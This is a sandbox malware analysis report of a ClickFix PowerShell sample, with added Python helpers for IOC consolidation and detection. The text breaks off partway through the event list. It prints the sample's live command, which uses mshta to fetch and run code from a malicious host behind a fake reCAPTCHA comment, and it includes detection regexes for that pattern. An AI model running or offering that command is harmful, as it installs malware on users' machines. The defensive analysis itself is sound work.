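The memory-string rows above mix three kinds of entry: the confirmed URLs with trailing scrape garbage (madonna.mp4TTC:, madonna.mp4d4LMEMp), truncated fragments (pawpaws1.readit-carfanatic, pawpaws.X), and benign strings that ship with PowerShell and .NET (contoso.com, aka.ms/pscore6, Pester). Most of the garbage variants of madonna.mp4 carry an Avira "safe" verdict while the clean URL is rated malware, so per-string verdicts only mean something once they are aggregated onto the canonical URL. The block below is an added example and not part of the Joe Sandbox report: it classifies a subset of rows copied from the table (verdict `None` where the table prints no AV detection line) against the two URLs and two hosts confirmed in the contacted-URL and domain tables. The classification rules, the function names and the row selection are the editor's assumptions.

```python
from urllib.parse import urlsplit

# URLs and hosts confirmed by actual network contact in the report's
# contacted-URL and domain tables (copied from the report).
CONFIRMED_URLS = {
    "https://pawpaws1.readit-carfanatics.com/madonna.vstx",
    "https://pawpaws.readit-carfanatics.com/madonna.mp4",
}
CONFIRMED_HOSTS = {"pawpaws.readit-carfanatics.com", "pawpaws1.readit-carfanatics.com"}

# Constructed subset of the memory-string table: (string, Avira URL Cloud verdict).
# None means the table prints no AV detection line for that row.
MEMORY_STRINGS = [
    ("https://pawpaws.readit-carfanatics.com/madonna.mp4O", "safe"),
    ("https://pawpaws.readit-carfanatics.com/madonna.mp4TTC:", "safe"),
    ("https://pawpaws.readit-carfanatics.com/madonna.mp4https://pawpaws.readit-carfanatics.com/madonna.mp4", "safe"),
    ("https://pawpaws.readit-carfanatics.com/madonna.mp4/E", "malware"),
    ("https://pawpaws.readit-carfanatics.com/madonna.mp4d4LMEMp", "safe"),
    ("https://pawpaws1.readit-carfanatic", "safe"),
    ("https://pawpaws.X", "safe"),
    ("http://pawpaws1.readit-carfanatics.com", "malware"),
    ("https://contoso.com/License", None),
    ("https://aka.ms/pscore6lB", None),
    ("http://crl.ver)", None),
    ("https://github.com/Pester/Pester", None),
]


def _looks_like_fragment(host: str) -> bool:
    """True when host is a cut-off or garbage-terminated form of a confirmed host."""
    if not host:
        return False
    first_label = host.split(".")[0]
    return any(h.startswith(host) or h.split(".")[0] == first_label for h in CONFIRMED_HOSTS)


def classify(candidate: str):
    """Map one scraped string to (kind, canonical).

    variant   : a confirmed URL followed by trailing memory garbage
    ioc       : a well-formed URL on a confirmed malicious host
    fragment  : truncated host, not resolvable to a single URL
    unrelated : a host the report does not flag (PowerShell/.NET strings etc.)
    """
    for good in sorted(CONFIRMED_URLS, key=len, reverse=True):
        if candidate.startswith(good):
            return "variant", good
    parts = urlsplit(candidate)
    host = (parts.hostname or "").lower()
    if host in CONFIRMED_HOSTS:
        return "ioc", f"{parts.scheme}://{host}{parts.path}"
    if _looks_like_fragment(host):
        return "fragment", None
    return "unrelated", candidate


def consolidate(rows):
    """Collapse scraped strings onto canonical IOCs and tally the per-string AV
    verdicts, so a pile of 'safe' verdicts on garbage variants is not mistaken
    for a clean bill on the real URL."""
    iocs = {}
    for text, verdict in rows:
        kind, canonical = classify(text)
        if kind not in ("variant", "ioc"):
            continue
        entry = iocs.setdefault(canonical, {"strings": 0, "safe_verdicts": 0, "malware_verdicts": 0})
        entry["strings"] += 1
        if verdict in ("safe", "malware"):
            entry[f"{verdict}_verdicts"] += 1
    return iocs


if __name__ == "__main__":
    for text, _ in MEMORY_STRINGS:
        print(f"{classify(text)[0]:9s} {text}")
    for url, stats in consolidate(MEMORY_STRINGS).items():
        print(url, stats)
```

Run against the constructed subset, the five madonna.mp4 strings collapse to one IOC with four "safe" and one "malware" verdict, which is the right reading of the table: the verdicts were issued against scrape artifacts, not against five different URLs. Fragments are deliberately not promoted to IOCs; a blocklist entry for "pawpaws.X" would be noise.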
Contacted Public IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
172.67.201.143 | pawpaws.readit-carfanatics.com | United States | | 13335 | CLOUDFLARENETUS | true

Contacted Private IPs
IP
127.0.0.1
General Information
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580443
Start date and time: 2024-12-24 15:30:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 9s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: #U65b0#U5efa #U6587#U672c#U6587#U6863.ps1 (renamed because the original name is a hash value)
Original Sample Name: .ps1
Detection: MAL
Classification: mal80.evad.winPS1@11/14@2/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 19
• Number of non-executed functions: 10
Cookbook Comments:
• Found application associated with file extension: .ps1
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 184.28.90.27, 4.175.87.197, 13.107.246.63
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target mshta.exe, PID 7560 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 7404 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7752 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7872 because it is empty
• Not all processes were analysed; the report is missing behavior information
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: #U65b0#U5efa #U6587#U672c#U6587#U6863.ps1
Time | Type | Description
09:31:00 | API Interceptor | 2x Sleep call for process: svchost.exe modified
09:31:02 | API Interceptor | 32x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://u48635528.ct.sendgrid.net/ls/click?upn=u001.9c3qucD-2BQzNTT0bmLRTJr37m0fhz0zdKJtvEO5GYL-2FheRuyVOh-2FQG4V3oBgBPYNynDxn_I1ksFJapfNmw0nKrksu71KTxdlg2CVrjzBUVofCtIEhaWkhL1Pph-2Ffg-2BCFbPvkCL9SX-2Fn-2BNBrku3RcjHS1atB8ladrmemt-2BtQU5680xhgoUl-2FmS0Bdj-2FOfednny-2F-2Bj2bwjjubeRvrpN0J7TGLD3CnNRzymiQOzypjCqxHhzmXtY2EWHJMJBxjl-2FHlyEIekWjEdTpTsRC8R5LaI-2BXF4kV8UeUtXxyFJLbYiR3fqcWt2evvBBECu9MeQj8TLZrmfuTf-2BJQraijp8-2BcIdxf8rnVxjHoJK1lo9-2Bkao444JbRSinVA-2FoUxeuAtdlrITU1Z6gHAn7DLZstY4XJkhkT16-2F2TN4CFt2LQ-2BEh9GWg4EPlocPi8ljTs-2B9D9RVbWdc3s2Vk2VPHSj20oCO3-2FalihBzGJuaYie5tnYaz6wBF3EqNzMXmVqRnMZwSYuGRwSMVhkchytYzt3hUH-2F51IUfn7nuhHUcUbdS8nBYneAMuB2eSDRn8IZzUkExLUascCVn8T9ImEyo0qhVsBPdJjfT9L3qli9clY1N-2BhQXDZgQnsN1Bs9PujeLzem37C62BvWnqPnqvXh5vbcvseiZwTP35DEJysw-3D-3D#mlyon@wc.com | malicious | HTMLPhisher | 104.17.25.14
 | vce exam simulator 2.2.1 crackk.exe | malicious | LummaC | 104.21.33.227
 | iUKUR1nUyD.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 172.67.199.72
 | j6ks0Fxu6t.exe | malicious | LummaC | 104.21.36.201
 | wIgjKoo9iI.exe | malicious | LummaC | 104.21.36.201
 | Canvas of Kings_N6xC-S2.exe | malicious | Unknown | 104.20.86.8
 | Canvas of Kings_N6xC-S2.exe | malicious | Unknown | 104.20.86.8
 | Audio02837498.html | malicious | HTMLPhisher | 104.17.25.14
 | SW_48912.scr.exe | malicious | FormBook | 104.21.80.1
 | cMTqzvmx9u.exe | malicious | LummaC, Amadey, LummaC Stealer, RedLine | 104.21.67.146
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | gYjK72gL17.exe | malicious | Stealc, Vidar | 172.67.201.143
 | Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 172.67.201.143
 | Gq48hjKhZf.exe | malicious | LodaRAT | 172.67.201.143
 | Gq48hjKhZf.exe | malicious | Unknown | 172.67.201.143
 | singl6.mp4.hta | malicious | LummaC | 172.67.201.143
 | hnskdfgjgar22.bat | malicious | Abobus Obfuscator, Braodo | 172.67.201.143
 | Proforma Invoice.exe | malicious | MassLogger RAT | 172.67.201.143
 | Azygoses125.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 172.67.201.143
 | WO.exe | malicious | Metasploit | 172.67.201.143
 | ChoForgot.exe | malicious | Vidar | 172.67.201.143
37f463bf4616ecd445d4a1937da06e19 | T1#U5b89#U88c5#U52a9#U624b1.0.2.exe | malicious | Nitol | 172.67.201.143
 | Canvas of Kings_N6xC-S2.exe | malicious | Unknown | 172.67.201.143
 | Technonomic.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 172.67.201.143
 | installer.msi | malicious | Unknown | 172.67.201.143
 | Azygoses125.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 172.67.201.143
 | Violated Heroine_91zbZ-1.exe | malicious | Unknown | 172.67.201.143
 | 3gPZmVbozD.msi | malicious | Unknown | 172.67.201.143
 | fkawMJ7FH8.exe | malicious | LummaC, Amadey, LummaC Stealer, RedLine, Stealc | 172.67.201.143
 | ChoForgot.exe | malicious | Vidar | 172.67.201.143
 | Archivo-PxFkiLTWYG-23122024095010.hta | malicious | Unknown | 172.67.201.143
                                            No context
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1310720
                                            Entropy (8bit):1.307352951978048
                                            Encrypted:false
                                            SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvr2:KooCEYhgYEL0In
                                            MD5:D789D00B7928E66708609B89A82AA8AB
                                            SHA1:B01C87601F6EBB0D371B92AB9BC783C8BE9F3FA8
                                            SHA-256:8C91BD35B070F3663B84090F3E1137B5005AE73DD370185B67B6FFD7EC897F3C
                                            SHA-512:6221A7893F553D584C407ABD907148D8191ABED27F93EF72EA629E8F91E706317C9C92EBC6E8BEB17B71E3FCC5E295516611A26FC71049BF3C6F1A73ECE510A7
                                            Malicious:false
                                            Reputation:low
                                            Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xd2dfb2c3, page size 16384, DirtyShutdown, Windows version 10.0
                                            Category:dropped
                                            Size (bytes):1310720
                                            Entropy (8bit):0.42212300337555064
                                            Encrypted:false
                                            SSDEEP:1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
                                            MD5:7EAEB2885F1C645275B198AC234486AD
                                            SHA1:01F40B79D96F10451224D2CCAE54F228DC409229
                                            SHA-256:E1E1BBCD3FF2F55095FA8CE4B140DDED79EB5597F24C80147DB21879F7D73A05
                                            SHA-512:6FF42D8E387274CE8D8352176DCA1D3CB3C0B120DE630DC15EFE569019028D4064A9F98AAEA4DED561EA14C203DE9E0155A741FC99F457BFD37C7EE2855102C2
                                            Malicious:false
                                            Reputation:low
                                            Preview:...... .......A.......X\...;...{......................0.!..........{A......|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................](t......|....................GO.....|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):16384
                                            Entropy (8bit):0.07580232782994088
                                            Encrypted:false
                                            SSDEEP:3:ds7XlKYeSALgv+Cejjn13a/apgvlqllcVO/lnlZMxZNQl:mXlKzpq+dj53qagQOewk
                                            MD5:55295C87F8F95D40B5DC5EE159F3B0F5
                                            SHA1:20C5B37BE6774E2D3C12FB93B91D2BCA6133C9BE
                                            SHA-256:426145C9B562BFAE00D232B6B3C2DDFFD09F4ECD67C979BE7ADA788689155255
                                            SHA-512:66E6A277A5FED29B92E2E2673D7787BC758D9C9AB57783F83A2FCAF3EDCC98EFAEC5285A072473D772C27764FC52233FE5EDDE18E14D8AA1D161D4FA81598EB8
                                            Malicious:false
                                            Preview:.m.M.....................................;...{.......|.......{A..............{A......{A..........{A]..................GO.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            Process:C:\Windows\System32\mshta.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):537096
                                            Entropy (8bit):6.144478549534115
                                            Encrypted:false
                                            SSDEEP:6144:STqUnHtfxded6JPje7sepeIeu39D5HepxekV9IdeZ8ye6IexLT:S/nHd
                                            MD5:CE7AA8E9E4E4B562FF54D31F64A65B56
                                            SHA1:175499A184EC22CAE1F4E1F5ED2ACD57E2C261FD
                                            SHA-256:9E3B0BA2F842C94308FE713CE02DD30F59DC79EDAE447BC2E495B38258E86AE7
                                            SHA-512:51F0016168271873CF5B764111C6C46B724FB5AC5D844C7838D2C7571550C8015D7DF5A998F195E0A5F7BC7E765E492D25D83BD903AC5E0D5534516CB3B40861
                                            Malicious:false
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1352
                                            Entropy (8bit):5.384205719576734
                                            Encrypted:false
                                            SSDEEP:24:3oWSKco4KmBs4RPT6GjKbmFoUebIKo+mZ9tXt/NK3R88bJ0yHrIS5cn:4WSU4y4RFymFoUeW+mZ9tlNWR83OMS6
                                            MD5:356A54A4A7055FC77512F403BB7FFCB3
                                            SHA1:C93F084D1CB5DB59A780E0A90E1C9EF5700AA525
                                            SHA-256:012C8DDCF134D696A147E268A444BEF1C581F6CED865550C09A4D8B4EA160E79
                                            SHA-512:C41175CC31396FEBB6092945FD81FB7838EDBEF7B559024C4090265E9EC237FA1EF26485E5E8B0EEB751AF32BBD2301661BB7432DA324CD102C86C04F24750DF
                                            Malicious:false
                                            Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):6221
                                            Entropy (8bit):3.7163347319501647
                                            Encrypted:false
                                            SSDEEP:96:K/4n33CxHvxkvhkvCCtwiaWiGBHjiaWiGBHj:K/4nyPtwit/itf
                                            MD5:78B52F3B7B5AF279F8517EB4DB0E9ABD
                                            SHA1:40868C05CF97EAB7F611308501BB8BBF8DE51AAE
                                            SHA-256:F15AA9ADA711A03A85DD4169A31C1F0E85E62A7921796A32E4F20E519623E857
                                            SHA-512:E951C4BC08F708E3804EE3A1B157ACC71B3CC43712321EC9CDF7E4DC4219A7F9031E390FEA3D40E3DAE8E6CB4BA559E204D861C9670DF864EF464B29ACC20D23
                                            Malicious:false
                                            Preview:...................................FL..................F.".. ...-/.v......Gq.V..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....yZzm.V....Sq.V......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.s...........................%..A.p.p.D.a.t.a...B.V.1......Y.s..Roaming.@......CW.^.Y.s..........................yiZ.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.s....Q...........
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):6221
                                            Entropy (8bit):3.7163347319501647
                                            Encrypted:false
                                            SSDEEP:96:K/4n33CxHvxkvhkvCCtwiaWiGBHjiaWiGBHj:K/4nyPtwit/itf
                                            MD5:78B52F3B7B5AF279F8517EB4DB0E9ABD
                                            SHA1:40868C05CF97EAB7F611308501BB8BBF8DE51AAE
                                            SHA-256:F15AA9ADA711A03A85DD4169A31C1F0E85E62A7921796A32E4F20E519623E857
                                            SHA-512:E951C4BC08F708E3804EE3A1B157ACC71B3CC43712321EC9CDF7E4DC4219A7F9031E390FEA3D40E3DAE8E6CB4BA559E204D861C9670DF864EF464B29ACC20D23
                                            Malicious:false
                                            Preview:...................................FL..................F.".. ...-/.v......Gq.V..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....yZzm.V....Sq.V......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.s...........................%..A.p.p.D.a.t.a...B.V.1......Y.s..Roaming.@......CW.^.Y.s..........................yiZ.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.s....Q...........
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):55
                                            Entropy (8bit):4.306461250274409
                                            Encrypted:false
                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                            Malicious:false
                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                            File type:Unicode text, UTF-8 text, with no line terminators
                                            Entropy (8bit):4.784398940592873
                                            TrID:
                                              File name:#U65b0#U5efa #U6587#U672c#U6587#U6863.ps1
                                              File size:116 bytes
                                              MD5:ce91da6730103e8f7311290bc43c20ad
                                              SHA1:6e512fd63d482dc1e5fc02f91a45a56681a4f430
                                              SHA256:5c82bdcc335fd2663b57278bda53c2f7b1a3c561e47e77807f3dd937aaa8e577
                                              SHA512:4ee5e8662114dc4f96bbc144906f582c85cc4250435c907be4bcebd93cfb5e93f772161ecac15630726da483573485a21c9e1814cbb6e32c146fe331ba151654
                                              SSDEEP:3:rN6eom7MXAE6Luj7FS96Ct+RbqRF4I1yMQRWL7n:Z6eo+MXAEOu+6C0IMPy7n
                                              TLSH:8FB012D7D81C12017A93A3A3176C379E9B7F227825F46A33629F487840279F2D717525
                                              File Content Preview:mshta https://pawpaws.readit-carfanatics.com/madonna.mp4 # ... ''I am not a robot - reCAPTCHA Verification ID: 2165
                                              Icon Hash:3270d6baae77db44
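The File Content Preview above is the entire 116-byte sample: one live statement that hands mshta a remote URL ending in .mp4, followed by a comment dressed up as a reCAPTCHA verification string (the text a ClickFix lure asks the victim to paste). The cookbook comments record the resulting lineage, powershell.exe 7404 spawning mshta.exe 7560, which in turn spawns the powershell.exe instances 7752 and 7872. Most of the dropped files are host noise rather than payload artifacts: the svchost.exe entries under C:\ProgramData\Microsoft\Network\Downloader are the BITS job database, and the six 60-byte "# PowerShell test file to determine AppLocker lockdown mode" files are the probe every PowerShell host writes at startup. The following detection helper is an added example, not code from Joe Sandbox or from the sample's author. It checks a script body for the three traits the preview shows (mshta plus a remote URL, a non-HTA extension on that URL, and a lure phrase in the comment) and walks process-creation events for the powershell-to-mshta-to-powershell chain. The event records are constructed: their field names, the child command lines, the parent PID 4242, the assumption that 7872 is a child of 7752, and the benign mshta event 7900 are all invented for the example; only the PIDs 7404, 7560, 7752 and 7872 and the sample text come from the report.

```python
"""Detection helpers for the mshta chain this report records.

Added example, not code from Joe Sandbox or from the sample's author. Event
field names, child command lines and PIDs other than 7404/7560/7752/7872 are
assumptions made for the example.
"""
import os
import re
from urllib.parse import urlparse

# The whole 116-byte sample, copied from the report's File Content Preview.
SAMPLE_PS1 = ("mshta https://pawpaws.readit-carfanatics.com/madonna.mp4 # ... "
              "''I am not a robot - reCAPTCHA Verification ID: 2165")

URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.IGNORECASE)
MSHTA_RE = re.compile(r"\bmshta(?:\.exe)?\b", re.IGNORECASE)
LURE_RE = re.compile(r"i am not a robot|recaptcha|verification id", re.IGNORECASE)
# -ExecutionPolicy Bypass/Unrestricted, including the -ep and -exec short forms.
EP_RE = re.compile(r"-(?:ep|exec(?:utionpolicy)?)\s+(?:bypass|unrestricted)", re.IGNORECASE)
# Names mshta is legitimately pointed at. mshta ignores the extension and runs
# whatever HTML/script the server returns, so ".mp4" is a decoy aimed at humans
# and URL-based filters, not at mshta.
LEGIT_MSHTA_EXT = {".hta", ".htm", ".html", ""}


def url_extension(url):
    """Lower-cased file extension of the URL path ('' when there is none)."""
    return os.path.splitext(urlparse(url).path)[1].lower()


def split_comment(line):
    """Split one PowerShell line into (code, comment); a '#' inside a URL is kept."""
    parts = re.split(r"\s#", line, maxsplit=1)
    return parts[0], (parts[1] if len(parts) > 1 else "")


def analyze_script(text):
    """Return (tag, evidence) findings for a script body; [] means nothing matched."""
    findings = []
    for raw in text.splitlines():
        code, comment = split_comment(raw)
        if MSHTA_RE.search(code):
            for url in URL_RE.findall(code):
                findings.append(("mshta_remote_payload", url))
                ext = url_extension(url)
                if ext not in LEGIT_MSHTA_EXT:
                    findings.append(("decoy_extension", ext))
        if LURE_RE.search(comment):
            findings.append(("clickfix_lure", comment.strip()))
    return findings


# Constructed process-creation events mirroring the report's process tree.
# Parent 4242, the child command lines and event 7900 are assumptions.
EVENTS = [
    {"pid": 7404, "ppid": 4242,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\sample.ps1"'},
    {"pid": 7560, "ppid": 7404, "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://pawpaws.readit-carfanatics.com/madonna.mp4"},
    {"pid": 7752, "ppid": 7560,
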